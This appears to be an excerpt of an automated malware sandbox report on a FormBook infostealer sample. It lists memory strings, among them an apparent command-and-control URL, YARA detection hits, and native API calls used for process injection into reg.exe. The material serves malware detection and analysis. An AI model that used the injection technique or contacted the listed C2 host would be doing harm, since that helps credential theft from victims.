            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: DAGiwzvTYsMjq.exe, 00000017.00000002.4131641803.0000000005509000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jleabres.com
            Source: DAGiwzvTYsMjq.exe, 00000017.00000002.4131641803.0000000005509000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jleabres.com/blhi/
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: reg.exe, 00000011.00000002.4128479477.00000000030C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: reg.exe, 00000011.00000002.4128479477.00000000030C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: reg.exe, 00000011.00000002.4128479477.00000000030C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: reg.exe, 00000011.00000002.4128479477.000000000309E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033g
            Source: reg.exe, 00000011.00000002.4128479477.000000000309E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: reg.exe, 00000011.00000003.2042624632.0000000008030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: reg.exe, 00000011.00000002.4130930355.000000000520C000.00000004.10000000.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4129787142.000000000473C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmail.help/hc/en-us/articles/1500000280141
            Source: reg.exe, 00000011.00000002.4130930355.000000000520C000.00000004.10000000.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4129787142.000000000473C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmailusercontent.com/filestorage/css/main.css
            Source: reg.exe, 00000011.00000002.4132621406.00000000065E0000.00000004.00000800.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4130930355.00000000040C6000.00000004.10000000.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4129787142.00000000035F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0042B7C3 NtClose,8_2_0042B7C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2B60 NtClose,LdrInitializeThunk,8_2_017E2B60
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_017E2DF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_017E2C70
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E35C0 NtCreateMutant,LdrInitializeThunk,8_2_017E35C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E4340 NtSetContextThread,8_2_017E4340
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E4650 NtSuspendThread,8_2_017E4650
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2BF0 NtAllocateVirtualMemory,8_2_017E2BF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2BE0 NtQueryValueKey,8_2_017E2BE0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2BA0 NtEnumerateValueKey,8_2_017E2BA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2B80 NtQueryInformationFile,8_2_017E2B80
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2AF0 NtWriteFile,8_2_017E2AF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2AD0 NtReadFile,8_2_017E2AD0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2AB0 NtWaitForSingleObject,8_2_017E2AB0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2D30 NtUnmapViewOfSection,8_2_017E2D30
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2D10 NtMapViewOfSection,8_2_017E2D10
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2D00 NtSetInformationFile,8_2_017E2D00
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2DD0 NtDelayExecution,8_2_017E2DD0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2DB0 NtEnumerateKey,8_2_017E2DB0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2C60 NtCreateKey,8_2_017E2C60
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2C00 NtQueryInformationProcess,8_2_017E2C00
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2CF0 NtOpenProcess,8_2_017E2CF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2CC0 NtQueryVirtualMemory,8_2_017E2CC0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2CA0 NtQueryInformationToken,8_2_017E2CA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2F60 NtCreateProcessEx,8_2_017E2F60
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2F30 NtCreateSection,8_2_017E2F30
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2FE0 NtCreateFile,8_2_017E2FE0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2FB0 NtResumeThread,8_2_017E2FB0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2FA0 NtQuerySection,8_2_017E2FA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2F90 NtProtectVirtualMemory,8_2_017E2F90
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2E30 NtWriteVirtualMemory,8_2_017E2E30
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2EE0 NtQueueApcThread,8_2_017E2EE0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2EA0 NtAdjustPrivilegesToken,8_2_017E2EA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2E80 NtReadVirtualMemory,8_2_017E2E80
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E3010 NtOpenDirectoryObject,8_2_017E3010
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E3090 NtSetValueKey,8_2_017E3090
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E39B0 NtGetContextThread,8_2_017E39B0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E3D70 NtOpenThread,8_2_017E3D70
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E3D10 NtOpenProcessToken,8_2_017E3D10
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03594340 NtSetContextThread,LdrInitializeThunk,17_2_03594340
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03594650 NtSuspendThread,LdrInitializeThunk,17_2_03594650
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592B60 NtClose,LdrInitializeThunk,17_2_03592B60
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592BF0 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_03592BF0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592BE0 NtQueryValueKey,LdrInitializeThunk,17_2_03592BE0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592BA0 NtEnumerateValueKey,LdrInitializeThunk,17_2_03592BA0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592AD0 NtReadFile,LdrInitializeThunk,17_2_03592AD0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592AF0 NtWriteFile,LdrInitializeThunk,17_2_03592AF0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592F30 NtCreateSection,LdrInitializeThunk,17_2_03592F30
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592FE0 NtCreateFile,LdrInitializeThunk,17_2_03592FE0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592FB0 NtResumeThread,LdrInitializeThunk,17_2_03592FB0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592EE0 NtQueueApcThread,LdrInitializeThunk,17_2_03592EE0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592E80 NtReadVirtualMemory,LdrInitializeThunk,17_2_03592E80
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592D10 NtMapViewOfSection,LdrInitializeThunk,17_2_03592D10
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592D30 NtUnmapViewOfSection,LdrInitializeThunk,17_2_03592D30
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592DD0 NtDelayExecution,LdrInitializeThunk,17_2_03592DD0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592DF0 NtQuerySystemInformation,LdrInitializeThunk,17_2_03592DF0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592C70 NtFreeVirtualMemory,LdrInitializeThunk,17_2_03592C70
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592C60 NtCreateKey,LdrInitializeThunk,17_2_03592C60
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592CA0 NtQueryInformationToken,LdrInitializeThunk,17_2_03592CA0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035935C0 NtCreateMutant,LdrInitializeThunk,17_2_035935C0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035939B0 NtGetContextThread,LdrInitializeThunk,17_2_035939B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592B80 NtQueryInformationFile,17_2_03592B80
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592AB0 NtWaitForSingleObject,17_2_03592AB0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592F60 NtCreateProcessEx,17_2_03592F60
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592F90 NtProtectVirtualMemory,17_2_03592F90
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592FA0 NtQuerySection,17_2_03592FA0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592E30 NtWriteVirtualMemory,17_2_03592E30
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592EA0 NtAdjustPrivilegesToken,17_2_03592EA0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592D00 NtSetInformationFile,17_2_03592D00
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592DB0 NtEnumerateKey,17_2_03592DB0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592C00 NtQueryInformationProcess,17_2_03592C00
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592CC0 NtQueryVirtualMemory,17_2_03592CC0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592CF0 NtOpenProcess,17_2_03592CF0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03593010 NtOpenDirectoryObject,17_2_03593010
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03593090 NtSetValueKey,17_2_03593090
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03593D70 NtOpenThread,17_2_03593D70
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03593D10 NtOpenProcessToken,17_2_03593D10
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CF8250 NtClose,17_2_02CF8250
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CF83B0 NtAllocateVirtualMemory,17_2_02CF83B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CF80C0 NtReadFile,17_2_02CF80C0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CF81B0 NtDeleteFile,17_2_02CF81B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CF7F60 NtCreateFile,17_2_02CF7F60
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 0_2_00CDD5BC0_2_00CDD5BC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004028408_2_00402840
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0040107A8_2_0040107A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004010808_2_00401080
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004012508_2_00401250
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004102E38_2_004102E3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004032F08_2_004032F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004023408_2_00402340
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0040233C8_2_0040233C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00416C1E8_2_00416C1E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0042DC238_2_0042DC23
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00416C238_2_00416C23
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00402D5D8_2_00402D5D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00402D608_2_00402D60
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004105038_2_00410503
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004025C98_2_004025C9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004025808_2_00402580
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0040E5838_2_0040E583
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00402D898_2_00402D89
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018641A28_2_018641A2
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018701AA8_2_018701AA
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018681CC8_2_018681CC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A01008_2_017A0100
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184A1188_2_0184A118
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018381588_2_01838158
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018420008_2_01842000
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018703E68_2_018703E6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BE3F08_2_017BE3F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186A3528_2_0186A352
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018302C08_2_018302C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018502748_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018705918_2_01870591
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B05358_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185E4F68_2_0185E4F6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018544208_2_01854420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018624468_2_01862446
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B07708_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D47508_2_017D4750
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AC7C08_2_017AC7C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CC6E08_2_017CC6E0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C69628_2_017C6962
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0187A9A68_2_0187A9A6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A08_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BA8408_2_017BA840
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B28408_2_017B2840
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE8F08_2_017DE8F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017968B88_2_017968B8
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01866BD78_2_01866BD7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186AB408_2_0186AB40
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AEA808_2_017AEA80
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BAD008_2_017BAD00
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AADE08_2_017AADE0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184CD1F8_2_0184CD1F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C8DBF8_2_017C8DBF
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850CB58_2_01850CB5
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0C008_2_017B0C00
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A0CF28_2_017A0CF2
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182EFA08_2_0182EFA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D0F308_2_017D0F30
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017F2F288_2_017F2F28
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A2FC88_2_017A2FC8
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01852F308_2_01852F30
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01824F408_2_01824F40
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186CE938_2_0186CE93
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0E598_2_017B0E59
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186EEDB8_2_0186EEDB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186EE268_2_0186EE26
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C2E908_2_017C2E90
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179F1728_2_0179F172
